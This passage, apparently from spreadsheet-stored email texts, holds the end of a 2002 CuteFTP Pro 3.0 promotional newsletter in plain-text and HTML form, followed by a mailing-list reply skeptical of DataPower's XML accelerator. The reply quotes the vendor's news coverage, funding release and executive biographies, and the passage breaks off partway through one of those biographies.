 Queue itemizing and ordering. Includes line-item number column, drag 'n 
 drop ordering, and automatic sorting by item status. 
 NEW! Transfer Engine
 New methods and properties added and others optimized. New scripting 
 samples and re-written SDK documentation now available. 
 --------------------------------------------------------------------------
 ------
 CuteFTP Pro 3.0 Features 
 Secure Connections
 Connect and transfer data securely using SSL, SSH2, OTP (S/KEY) and HTTPS.
 Accelerated File Transfers
 CuteFTP Pro has the most powerful transfer engine on the market, bar none.
 Built-in HTML Editor
 Take control of your Web site with this powerful, text-based HTML editor. 
 Folder Synchronization
 This flexible tool takes the programming out of synchronizing local and 
 remote folders. 
 Powerful Scheduler
 Simply drop your files in the Queue and click the schedule button for 
 options. 
 Virtually Unlimited Automation
 Create sophisticated scripts for automating FTP tasks through its COM 
 enabled Transfer Engine.
 If you do not wish to receive announcements from GlobalSCAPE via e-mail, 
 please click the remove link below and accept our apologies for any 
 inconvenience.
 http://www.globalscape.com/cgi-bin/rm.cgi?mail=jm-cuteftp@jmason.org
 ------=NextPart00A_000_73019636D
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;META content="" name="description"&gt;
 &lt;META content="" name="keywords"&gt;
 &lt;META content="CuteHTML" name="generator"&gt;
 &lt;/HEAD&gt;
 &lt;BODY text="#000000" vLink="#000000" link="#000000" bgColor="#ffffff"&gt;
 &lt;table cellSpacing="0" cellPadding="0" width="600" border="0"&gt;
 &lt;tr&gt;
 &lt;td vAlign="top" colSpan="3"&gt;&lt;IMG 
 src="http://www.cuteftp.com/images/email/newsletter_header.gif"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;TD width="13" 
 background="http://www.cuteftp.com/images/email/newsletter_border.gif" 
 rowSpan="3"&gt;&amp;nbsp;&lt;/TD&gt;
 &lt;td width="574"&gt;&amp;nbsp;&lt;/td&gt;
 &lt;TD width="13" 
 background="http://www.cuteftp.com/images/email/newsletter_border.gif" 
 rowSpan="3"&gt;&amp;nbsp;&lt;/TD&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img 
 src="http://www.cuteftp.com/images/email/dearcuteftpuser.gif" 
 hspace="15"&gt;&lt;IMG height="10" src="http://www.cuteftp.com/images/trans.
 gif" 
 width="250" border="0"&gt;&lt;IMG 
 src="http://www.cuteftp.com/images/email/nov2002.gif" hspace="5"&gt;
 &lt;br&gt;
 &lt;TABLE id="Table1" cellSpacing="15" cellPadding="0" width="574" 
 border="0"&gt;
 &lt;TR&gt;
 &lt;TD width="145" valign="top"&gt;
 &lt;center&gt;&lt;img 
 src="http://www.cuteftp.com/images/boxes/v2_cuteftppro100.gif" 
 border="0"&gt;&lt;/center&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;img src="http://www.cuteftp.com/images/email/purchase_bar.gif" 
 vspace="10"&gt;&lt;br&gt;
 &lt;font face="verdana,arial,helvetica" size="1"&gt;&lt;b&gt;Purchase CuteFTP Pro 3.0 
 for just 
 $59.95!&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;table width="145" cellpadding="0" cellspacing="4" border="0" 
 ID="Table12"&gt;
 &lt;tr&gt;
 &lt;td width="15" height="15" valign="top"&gt;
 &lt;a 
 href="http://www.globalscape.com/email/redirect.asp?id=pr3unreg&amp;link=buy"&gt;
 &lt;img src="http://www.cuteftp.com/images/leftnav/arrow_blue.gif" 
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign="top"&gt;
 &lt;font style="font-family: verdana,arial,helvetica; font-size: 10pt; 
 font-weight: bold; color: #000000;"&gt;&lt;a 
 href="http://www.globalscape.com/email/redirect.asp?id=pr3unreg&amp;link=buy"&gt;
 Buy Now&lt;/a&gt;&lt;br&gt;&lt;font color="#3366cc"&gt;$59.95&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;br&gt;
 For volume discounts and site license pricing, contact our sales team:&lt;br&gt;
 800-290-5054 (USA)&lt;br&gt;
 210-308-8267 (Int'l)&lt;BR&gt;
 &lt;a href="mailto:sales@globalscape.com"&gt;sales@globalscape.com&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;Br&gt;
 &lt;br&gt;
 &lt;img src="http://www.cuteftp.com/images/email/testmon_bar.gif" 
 vspace="10"&gt;&lt;br&gt;
 "FTP products play a vital role in networking and transfer of data, where,
 we feel GlobalSCAPE, through CuteFTP, is undoubtedly the industry leader."
 &lt;p&gt;
 -Pragyal Singh&lt;Br&gt;
 Corporate Advisory Services&lt;bR&gt;
 Ernst &amp; Young Private Limited&lt;Br&gt;
 &lt;/font&gt;
 &lt;/TD&gt;
 &lt;TD valign="top"&gt;&lt;font face="verdana,arial,helvetica" size="1"&gt; 
 &lt;img src="http://www.cuteftp.com/images/logos/msxp_logo2.gif" 
 align="right" hspace="20"&gt;
 &lt;p align="justify"&gt;&lt;b&gt;New Release!&lt;/b&gt;&lt;br&gt;
 GlobalSCAPE is pleased to announce the latest release of CuteFTP Pro, 
 "Designed for Windows XP". The "Designed for XP" logo confirms that 
 CuteFTP 
 Pro 3.0 meets Windows XP compatibility, performance and stability 
 criteria. 
 CuteFTP Pro 3.0 runs on Windows 9x, NT, ME, 2000 and XP. Click 
 &lt;A href="http://www.globalscape.com/download/cuteftppro.asp"&gt;
 here&lt;/A&gt; to download your free 30-day trial!
 &lt;/p&gt;
 &lt;hr noshade color="#cc0033"&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;XP Logo Certified &lt;/B&gt;
 &lt;BR&gt;
 CuteFTP Pro has been updated to conform to Microsoft's Windows XP Design 
 Guidelines. Note: You must have Windows XP in order to take advantage of 
 the 
 new XP interface.
 &lt;P&gt;&lt;/P&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;Enhanced Security&lt;/B&gt;&lt;BR&gt;
 SSH2 public key support, Cipher and MAC selection, SSH2 rename and 
 ASCII transfers, password policies, and more.
 &lt;P&gt;&lt;/P&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;Site &amp; Folder Maintenance &lt;/B&gt;
 &lt;BR&gt;
 Folder Monitoring tool, Backup &amp; Archival tool, Server Time-zone Offset, 
 Preserve Local Time option and more.
 &lt;P&gt;&lt;/P&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;Classic CuteFTP Features&lt;/B&gt;&lt;BR&gt;
 Load &amp; save queue, Folder Compare, startup and after transfer events, 
 group 
 selection, and more.
 &lt;P&gt;&lt;/P&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;Enhanced Queue&lt;/B&gt;&lt;BR&gt;
 Queue itemizing and ordering. Includes line-item number column, drag 'n 
 drop 
 ordering, and automatic sorting by item status.
 &lt;P&gt;&lt;/P&gt;
 &lt;FONT style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; COLOR: #3366cc; 
 FONT-FAMILY: verdana,arial,helvetica"&gt;
 NEW!&lt;/FONT&gt; &lt;B&gt;Transfer Engine&lt;/B&gt;&lt;BR&gt;
 New methods and properties added and others optimized. New scripting 
 samples 
 and re-written SDK documentation now available.
 &lt;HR color="#cc0033" noShade&gt;
 &lt;BR&gt;
 &lt;a href="http://www.cuteftp.com/images/screenshots/pr3_2.gif"&gt;
 &lt;img src="http://www.cuteftp.com/images/screenshots/pr3_2_sm.gif" 
 border="0" align="right"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;B&gt;CuteFTP Pro 3.0 Features&lt;/B&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;P&gt;&lt;B&gt;Secure Connections&lt;/B&gt;&lt;BR&gt;
 Connect and transfer data securely using SSL, SSH2, OTP (S/KEY) and HTTPS.
 &lt;P&gt;
 &lt;B&gt;Accelerated File Transfers&lt;/B&gt;&lt;BR&gt;
 CuteFTP Pro has the most powerful transfer engine on the market, bar none.
 &lt;Br&gt;
 &lt;DIV align="right"&gt;&lt;I&gt;Click screenshot for larger view&lt;/I&gt;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/DIV&gt;
 &lt;BR&gt;
 &lt;STRONG&gt;Built-in HTML Editor&lt;/STRONG&gt;&lt;BR&gt;
 Take control of your Web site with this powerful, text-based HTML editor.
 &lt;p&gt;
 &lt;STRONG&gt;Folder Synchronization&lt;/STRONG&gt;&lt;BR&gt;
 This flexible tool takes the programming out of synchronizing local and 
 remote 
 folders.
 &lt;P&gt;&lt;B&gt;Powerful Scheduler&lt;/B&gt;&lt;BR&gt;
 Simply drop your files in the Queue and click the schedule button for 
 options.
 &lt;P&gt;&lt;B&gt;Virtually Unlimited Automation&lt;/B&gt;&lt;BR&gt;
 Create sophisticated scripts for automating FTP tasks through its COM 
 enabled 
 Transfer Engine.&lt;P&gt;
 &lt;table width="145" cellpadding="0" cellspacing="4" border="0" 
 ID="Table12"&gt;
 &lt;tr&gt;
 &lt;td width="15" height="15" valign="top"&gt;
 &lt;a 
 href="http://www.globalscape.com/email/redirect.asp?id=pr3unreg&amp;link=buy"&gt;
 &lt;img src="http://www.cuteftp.com/images/leftnav/arrow_blue.gif" 
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign="top"&gt;
 &lt;font style="font-family: verdana,arial,helvetica; font-size: 10pt; 
 font-weight: bold; color: #000000;"&gt;&lt;a 
 href="http://www.globalscape.com/email/redirect.asp?id=pr3unreg&amp;link=buy"&gt;
 Learn More&lt;/a&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/font&gt;&lt;/p&gt; &lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;tr&gt;
 &lt;td colSpan="2"&gt;&lt;font face="verdana,arial,helvetica" size="1"&gt; 
 &lt;b&gt;Unsubscribe instructions&lt;/b&gt;&lt;br&gt;
 If you do not wish to receive announcements from GlobalSCAPE via e-mail, 
 please 
 click the remove link below and accept our apologies for any 
 inconvenience.:&lt;br&gt;
 &lt;a 
 href="http://www.globalscape.com/cgi-bin/rm.cgi?mail=jm-cuteftp@jmason.
 org"&gt;
 Remove&lt;/a&gt;
 &lt;p&gt;&lt;/p&gt;
 To receive our newsletters in plain text, please click the link below:&lt;br&gt;
 &lt;a 
 href="http://www.globalscape.com/cgi-bin/rt.cgi?mail=jm-cuteftp@jmason.
 org"&gt;
 Plain Text&lt;/a&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colSpan="2"&gt;&lt;font face="verdana,arial,helvetica" size="1"&gt;
 2002 &lt;A href="http://www.globalscape.com"&gt;
 GlobalSCAPE, Inc.&lt;/A&gt; &lt;A 
 href="http://www.globalscape.com/company/privacy.shtml"&gt;
 Privacy Policy&lt;/A&gt; &lt;A 
 href="http://www.globalscape.com/company/trademarks.shtml"&gt;
 Trademarks&lt;/A&gt;&lt;BR&gt;
 &lt;br&gt;
 Microsoft, Windows, and the Windows logo are trademarks, or registered 
 trademarks of Microsoft Corporation in the United States and/or other 
 countries. &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td vAlign="top" colSpan="3"&gt;
 &lt;IMG src="http://www.cuteftp.com/images/email/newsletter_footer.gif"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://www.cuteftp.com/scripts/pv.asp?pid=11"&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 ------=NextPart00A_000_73019636D--
</t>
  </si>
  <si>
    <t xml:space="preserve">If it's not stateful, it wouldn't seem to be worth the effort, although I guess it might help with DDoS attacks.
 Sounds snake-oilish to me, but I'm biased by lots of experience with firewalls and proxy servers, and the limitations thereof.
 Ken
 &gt; -----Original Message-----
 &gt; From: Rohit Khare [mailto:khare@alumni.caltech.edu]
 &gt; Sent: Tuesday, August 27, 2002 5:00 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: DataPower announces XML-in-silicon
 &gt; 
 &gt; 
 &gt; No analysis yet... don't know what to make of it yet. But 
 &gt; here's the raw 
 &gt; bits for all to peruse and check out what's really going on... Best, 
 &gt; Rohit
 &gt; 
 &gt; ===========================================================
 &gt; 
 &gt; DataPower delivers XML acceleration device
 &gt; ByScott Tyler Shafer
 &gt; August 27, 2002 5:46 am PT
 &gt; 
 &gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
 &gt; specifically to process XML data. Unlike competing solutions that 
 &gt; process XML data in software, DataPower's device processes 
 &gt; the data in 
 &gt; hardware -- a technology achievement that provides greater 
 &gt; performance, 
 &gt; according to company officials.
 &gt; 
 &gt; The new device, dubbed DataPower XA35 XML Accelerator, is the 
 &gt; first in a 
 &gt; family of products expected from the Cambridge, Mass.-based 
 &gt; startup. The 
 &gt; DataPower family is based on a proprietary processing core technology 
 &gt; called XG3 that does the analysis, parsing, and processing of the XML 
 &gt; data.
 &gt; 
 &gt; According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
 &gt; conceived to meet the steady adoption of XML, the anticipated future 
 &gt; proliferation of Web services, and as a means to share data 
 &gt; between two 
 &gt; businesses.
 &gt; 
 &gt; "Our vision is to build out an XML-aware infrastructure," Kelly said. 
 &gt; "The XA35 is the first of a family."
 &gt; 
 &gt; Kelly explained that converting data into XML increases the 
 &gt; file size up 
 &gt; to 20 times. This, he said, makes processing the data very taxing on 
 &gt; application servers; DataPower believes an inline device is the best 
 &gt; alternative.
 &gt; 
 &gt; In addition to the large file sizes, security is also of paramount 
 &gt; importance in the world of XML.
 &gt; 
 &gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
 &gt; said. "A SOAP packet with XML will go straight through a firewall. 
 &gt; Firewalls are blind to XML today."
 &gt; 
 &gt; Future products in DataPowers family will focus more specifically on 
 &gt; security, especially as Web services proliferate, Kelly said.
 &gt; 
 &gt; According to DataPower, most existing solutions to offload XML 
 &gt; processing are homegrown and done in software -- an approach 
 &gt; the company 
 &gt; itself tried initially and found to be inadequate with 
 &gt; regards to speed 
 &gt; and security. After trying the software path, the company turned to 
 &gt; creating a solution that would process XML in hardware.
 &gt; 
 &gt; "Our XG3 execution core converts XML to machine code," said Kelly, 
 &gt; adding that to his knowledge no other company's solution does. Kelly 
 &gt; said in the next few months he expects the market to be flooded with 
 &gt; technologies that claim to do XML processing -- claims that 
 &gt; he believes 
 &gt; will be mostly false.
 &gt; Other content-aware switches, such as SSL (secure socket layer) 
 &gt; accelerators and load balancers, look at the first 64 bytes 
 &gt; of a packet, 
 &gt; while the XA35 provides deeper packet inspection, looking at 
 &gt; 1,400 bytes 
 &gt; and thus enabling greater processing of XML data, Kelly explained.
 &gt; 
 &gt; The 1U-high network device has been tested against a large 
 &gt; collection of 
 &gt; XML and XSL data types and can learn new flavors of the 
 &gt; markup language 
 &gt; as they pass through the device.
 &gt; 
 &gt; The XA35 can be deployed in proxy mode behind a firewall and a load 
 &gt; balancer, and it will inspect all traffic that passes and 
 &gt; will identify 
 &gt; and process those packets that are XML, Kelly said.
 &gt; 
 &gt; In addition to proxy mode, the device can also be used as an 
 &gt; application 
 &gt; co-processor. This deployment method gives administrators 
 &gt; more granular 
 &gt; control over what data is inspected and the application server itself 
 &gt; controls the device.
 &gt; 
 &gt; DataPower is not the only company chasing this emerging 
 &gt; market. Startup 
 &gt; Sarvega, based in Burr Ridge, Ill., introduced the Sarvega 
 &gt; XPE switch in 
 &gt; May, and earlier this month Tarari, an Intel spin-off, 
 &gt; launched with a 
 &gt; focus on content processing and acceleration.
 &gt; The DataPower device is now available, priced starting at 
 &gt; $54,995. The 
 &gt; company has announced one customer to date and says the product is in 
 &gt; field trails at a number of other enterprises.
 &gt; 
 &gt; ==============================================================
 &gt; ===========
 &gt; 
 &gt; DataPower has been addressing enterprise networking needs 
 &gt; since it was 
 &gt; founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
 &gt; foresaw the adverse effects XML and other next generation protocols 
 &gt; would have on enterprise networks. Long before industry 
 &gt; interest in XML 
 &gt; grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
 &gt; designed the industry's first solutions to address the unique 
 &gt; requirements for processing XML. The first such solution was 
 &gt; a software 
 &gt; interpreter called DGXT. This software-based approach to XML 
 &gt; processing 
 &gt; is still licensed by many companies for use in their own 
 &gt; products today.
 &gt; 
 &gt; Leveraging the detailed knowledge and customer experience gained from 
 &gt; developing software-based accelerators, Kuznetsov's team 
 &gt; raised the bar 
 &gt; and designed a system for processing XML in purpose-built 
 &gt; hardware. In 
 &gt; 2001, DataPower's effort produced XML Generation Three (XG3), the 
 &gt; industry's fastest technology for XML processing, bar none.
 &gt; 
 &gt; Today, XG3 technology powers the industry's first wire-speed XML 
 &gt; network devices, enabling secure, high-speed applications and XML Web 
 &gt; Services. While other companies are just now marketing first 
 &gt; versions of 
 &gt; products, DataPower is delivering its third generation of technology, 
 &gt; providing an immediate return on technology investments to 
 &gt; industry-leading customers and partners.
 &gt; 
 &gt; DataPower's M.I.T. heritage is complemented by a management team that 
 &gt; brings decades of experience in the networking and computing 
 &gt; industries, 
 &gt; drawing veteran leaders from several successful companies including 
 &gt; Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
 &gt; 
 &gt; ==============================================================
 &gt; ===========
 &gt; 
 &gt; DataPower Technology Secures $9.5 Million in Funding
 &gt; 
 &gt; Venrock Associates, Mobius Venture Capital and Seed Capital 
 &gt; Back Pioneer 
 &gt; in XML-Aware Networking for Web Services
 &gt; 
 &gt; CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
 &gt; leading provider of XML-Aware network infrastructure, today announced 
 &gt; that it has secured $9.5 million in series B financing. Investors for 
 &gt; this round include Venrock Associates, Mobius Venture Capital 
 &gt; and Seed 
 &gt; Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, 
 &gt; of Mobius, 
 &gt; and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of 
 &gt; Directors.
 &gt; 
 &gt; DataPower will use this funding to accelerate development, 
 &gt; marketing and 
 &gt; sales of the companys breakthrough technology for XML-Aware 
 &gt; networking. 
 &gt; Founded in 1999, DataPower invented the worlds first intelligent XML 
 &gt; networkingdevices, capable of transforming XML traffic and 
 &gt; transactions 
 &gt; at the wire-speed enterprises need to effectively embrace Web 
 &gt; services 
 &gt; and other XML-centric initiatives. DataPowers solutions are based on 
 &gt; its patent-pending XML Generation Three (XG3) technology.
 &gt; 
 &gt; "Enterprises are adopting XML at rapid rate to facilitate inter-and 
 &gt; intra-company communications but their network infrastructure is ill 
 &gt; prepared to support the requirements of this new traffic type. 
 &gt; DataPowers XML-acceleration devices enable the wirespeed 
 &gt; processing of 
 &gt; XML that is required to support next generation enterprise 
 &gt; applications," said Eugene Kuznetsov, CTO and founder of DataPower 
 &gt; Technology.
 &gt; 
 &gt; "DataPower gives companies the ability to use XML thats 
 &gt; critical to Web 
 &gt; services projects without sacrificing an ounce of 
 &gt; performance." A single 
 &gt; DataPower acceleration engine delivers the processing power of 10 
 &gt; serversbreaking the performance bottleneck associated with XML 
 &gt; processing and delivering an extraordinary return on investment. In 
 &gt; addition, the DataPower platform provides enhanced XML security, 
 &gt; protection against XML-based denial-of-service attacks, connection of 
 &gt; e-business protocols for incompatible XML data streams, load 
 &gt; balancing 
 &gt; between back-end servers and real-time statistics reports.
 &gt; 
 &gt; "In the post-bubble economy, technology investment decisions require 
 &gt; laser-focused scrutiny. DataPowers patent-pending technology 
 &gt; addresses 
 &gt; a very real and growing pain point for enterprises," said Michael 
 &gt; Tyrrell of Venrock Associates. "By turbo-charging their networks with 
 &gt; DataPowers unique XML-Aware networking technology, companies will be 
 &gt; free to adopt next generation Web services without encountering 
 &gt; performance and security pitfalls."
 &gt; 
 &gt; "We looked long and hard for a company capable of addressing 
 &gt; the rapidly 
 &gt; growing problems surrounding XML message processing performance and 
 &gt; security," said Bill Burnham of Mobius Venture Capital. 
 &gt; "DataPower is on 
 &gt; their third generation of technology. Their patent pending XML 
 &gt; Generation Three (XG3)technology was quite simply the single most 
 &gt; compelling technology solution we have seen to date."
 &gt; 
 &gt; "XML is not a nice-to-have, it is a must have for enterprises serious 
 &gt; about optimizing application efficiency. Since 1999, 
 &gt; DataPower has been 
 &gt; developing solutions to facilitate enterprise use of XML and Web 
 &gt; services," said Jeff Fagnan of Seed Capital Partners. "DataPowers 
 &gt; XML-acceleration devices are a key requirement for 
 &gt; enterprises that rely 
 &gt; on XML for mission critical applications."
 &gt; 
 &gt; About Venrock Associates
 &gt; Venrock Associates was founded as the venture capital arm of the 
 &gt; Rockefeller Family and continues a tradition of funding entrepreneurs 
 &gt; that now spans over seven decades. Laurance S. Rockefeller pioneered 
 &gt; early stage venture financing in the 1930s. With over 300 investments 
 &gt; over a span of more than 70 years, the firm has an 
 &gt; established a track 
 &gt; record of identifying and supporting promising early stage, 
 &gt; technology- 
 &gt; based enterprises. As one of most experienced venture firms in the 
 &gt; United States, Venrock maintains a tradition of collaboration with 
 &gt; talented entrepreneurs to establish successful, enduring companies. 
 &gt; Venrock's continuing goal is to create long-term value by assisting 
 &gt; entrepreneurs in building companies from the formative stages. Their 
 &gt; consistent focus on Information Technology and Life Sciences-related 
 &gt; opportunities provides a reservoir of knowledge and a network of 
 &gt; contacts that have proven to be a catalyst for the growth of 
 &gt; developing 
 &gt; organizations. Venrock's investments have included CheckPoint 
 &gt; Software, 
 &gt; USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
 &gt; Media Metrix, 3COM, Intel, and Apple Computer. With offices 
 &gt; in New York 
 &gt; City, Cambridge, MA, and Menlo Park, CA, Venrock is well 
 &gt; positioned to 
 &gt; respond to opportunities in any locale. For more information 
 &gt; on Venrock 
 &gt; Associates, please visit www.venrock.com
 &gt; 
 &gt; About Mobius Venture Capital
 &gt; Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
 &gt; billion U.S.-based private equity venture capital firm managed by an 
 &gt; unparalleled team of former CEOs and entrepreneurs, 
 &gt; technology pioneers, 
 &gt; senior executives from major technology corporations, and 
 &gt; leaders from 
 &gt; the investment banking community. Mobius Venture Capital specializes 
 &gt; primarily in early-stage investments in the areas of: communications 
 &gt; systems software and services; infrastructure software and services; 
 &gt; professional services; enterprise applications; healthcare 
 &gt; informatics; 
 &gt; consumer and small business applications; components; and emerging 
 &gt; technologies. Mobius Venture Capital combines its technology 
 &gt; expertise 
 &gt; and broad financial assets with the industry's best entrepreneurs to 
 &gt; create a powerhouse portfolio of over 100 of the world's leading high 
 &gt; technology companies. Mobius Venture Capital can be contacted by 
 &gt; visiting their web site www.mobiusvc.com.
 &gt; 
 &gt; About Seed Capital Partners
 &gt; Seed Capital Partners is an early-stage venture fund affiliated with 
 &gt; SoftBank Corporation, one of the world's leading Internet 
 &gt; market forces. 
 &gt; Seed Capital manages funds focused primarily on companies addressing 
 &gt; Internet-enabled business-to-business digital information technology 
 &gt; opportunities, which are located in the Northeastern U.S., the 
 &gt; southeastern region of the Province of Ontario, Canada, and 
 &gt; Israel. Seed 
 &gt; Capitals portfolio includes Spearhead Technologies, 
 &gt; Concentric Visions 
 &gt; and CompanyDNA. For more information on Seed Capital Partners, please 
 &gt; visit www.seedcp.com.
 &gt; 
 &gt; About DataPower Technology
 &gt; DataPower Technology provides enterprises with intelligent XML-Aware 
 &gt; network infrastructure to ensure unparalleled performance, 
 &gt; security and 
 &gt; manageability of next-generation protocols. DataPowers 
 &gt; patent-pending 
 &gt; XML Generation Three (XG3) technology powers the industrys first 
 &gt; wirespeed XML network devices, enabling secure, high-speed 
 &gt; applications 
 &gt; and XML Web Services. Founded in 1999, DataPower is now 
 &gt; delivering its 
 &gt; third generation of technology, providing immediate return on 
 &gt; technology 
 &gt; investments to industry-leading customers and partners. DataPower is 
 &gt; privately held and based in Cambridge, MA. Investors include Mobius 
 &gt; Venture Capital, Seed Capital Partners, and Venrock Associates.
 &gt; 
 &gt; CONTACT:
 &gt; 
 &gt; DataPower Technology, Inc.
 &gt; Kieran Taylor
 &gt; 617-864-0455
 &gt; kieran@datapower.com
 &gt; 
 &gt; Schwartz Communications
 &gt; John Moran/Heather Chichakly
 &gt; 781-684-0770
 &gt; datapower@schwartz-pr.com
 &gt; 
 &gt; ==============================================================
 &gt; ==========
 &gt; 
 &gt; Steve Kelly, chairman and CEO
 &gt; 
 &gt; During over twenty years in the technology industry, Steve Kelly has 
 &gt; built and managed global enterprise networks, provided consulting 
 &gt; services to Fortune 50 businesses, and been involved in the launch of 
 &gt; several start-ups. Prior to DataPower, Kelly was an 
 &gt; entrepreneur-in-residence at Venrock Associates, and was 
 &gt; co-founder of 
 &gt; Castle Networks, where he led the company's sales, service 
 &gt; and marketing 
 &gt; functions. Castle was acquired by Siemens AG in 1999 to 
 &gt; create Unisphere 
 &gt; Networks, which was subsequently purchased by Juniper Networks. Kelly 
 &gt; was an early contributor at Cascade Communications, where he 
 &gt; built and 
 &gt; managed the company's core switching business; Cascade's 
 &gt; annual revenues 
 &gt; grew from $2 million to $300 million annually during Kelly's tenure. 
 &gt; Kelly also worked at Digital Equipment Corporation where he 
 &gt; managed and 
 &gt; grew their corporate network to 50,000+ nodes in 28 countries, the 
 &gt; largest in the world at the time. Kelly has a B.S. in Information 
 &gt; Systems from Bentley College.
 &gt; 
 &gt; Eugene Kuznetsov, founder, president and CTO
 &gt; 
 &gt; Eugene Kuznetsov is a technology visionary that has been working to 
 &gt; address enterprise XML issues since the late 90s. Kuznetsov founded 
 &gt; DataPower Technology, Inc. in 1999 to provide enterprises with an 
 &gt; intelligent, XML-aware network infrastructure to support 
 &gt; next-generation 
 &gt; applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
 &gt; Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
 &gt; was also part of the team which developed one of the first clean room 
 &gt; Java VM's. This high-speed runtime technology was licensed by some of 
 &gt; the industry's largest technology companies, including Apple 
 &gt; Computer. 
 &gt; He has consulted to numerous companies and worked on a variety of 
 &gt; hardware and software engineering problems in the areas of memory 
 &gt; management, power electronics, optimized execution engines and 
 &gt; application integration. Kuznetsov holds a B.S. in electrical 
 &gt; engineering from MIT.
 &gt; 
 &gt; Steve Willis, vice president of advanced technology
 &gt; 
 &gt; Steve Willis is an accomplished entrepreneur and a pioneer in 
 &gt; protocol 
 &gt; optimization. Prior to joining DataPower, Willis was 
 &gt; co-founder and CTO 
 &gt; of Argon Networks, a provider of high-performance switching 
 &gt; routers that 
 &gt; was acquired by Siemens AG in 1999 to create Unisphere Networks; 
 &gt; Unisphere was subsequently purchased by Juniper Networks. 
 &gt; Before Argon, 
 &gt; Steve was vice president of advanced technology at Bay Networks (now 
 &gt; Nortel Networks) where he led both IP and ATM-related technology 
 &gt; development and managed a group that generated 24 patent 
 &gt; applications, 
 &gt; developed a 1 Mbps forwarding engine and led the specification of the 
 &gt; ATM Forum's PNNI routing protocol. Most notably, Steve was 
 &gt; co-founder, 
 &gt; original software director and architect for Wellfleet 
 &gt; Communications, a 
 &gt; leading pioneer of multi-protocol routers. Wellfleet was rated as the 
 &gt; fastest growing company in the U.S. for two consecutive years 
 &gt; by Fortune 
 &gt; magazine. Willis is currently a member of the Institute of Electrical 
 &gt; and Electronics Engineers (IEEE) and the Internet Research Task Force 
 &gt; (IRTF) Routing Research Group. Willis has a B.D.I.C. in 
 &gt; Computer Science 
 &gt; from the University of Massachusetts.
 &gt; 
 &gt; Bill Tao, vice president of engineering
 &gt; 
 &gt; With a vast understanding of network optimization technologies and 
 &gt; extensive experience in LAN and WAN networking, Bill Tao 
 &gt; brings over 25 
 &gt; years of critical knowledge to lead DataPower's engineering efforts. 
 &gt; Prior to DataPower, Tao was the vice president of engineering for 
 &gt; Sycamore Networks, developing a family of metro/regional 
 &gt; optical network 
 &gt; switches. He is also well acquainted with network optimization 
 &gt; techniques as he was previously vice president of engineering at 
 &gt; InfoLibria, where he led development and software quality assurance 
 &gt; engineering for a family of network caching products. Tao has held 
 &gt; senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
 &gt; received a B.S. in Electrical Engineering from the University of 
 &gt; Connecticut and an M.S. in Computer Science from the University of 
 &gt; Illinois.
 &gt; 
 &gt; Kieran Taylor, director of product marketing
 &gt; 
 &gt; Kieran Taylor has an accomplished record as a marketing professional, 
 &gt; industry analyst and journalist. Prior to joining DataPower, 
 &gt; Taylor was 
 &gt; the director of product management and marketing for Akamai 
 &gt; Technologies 
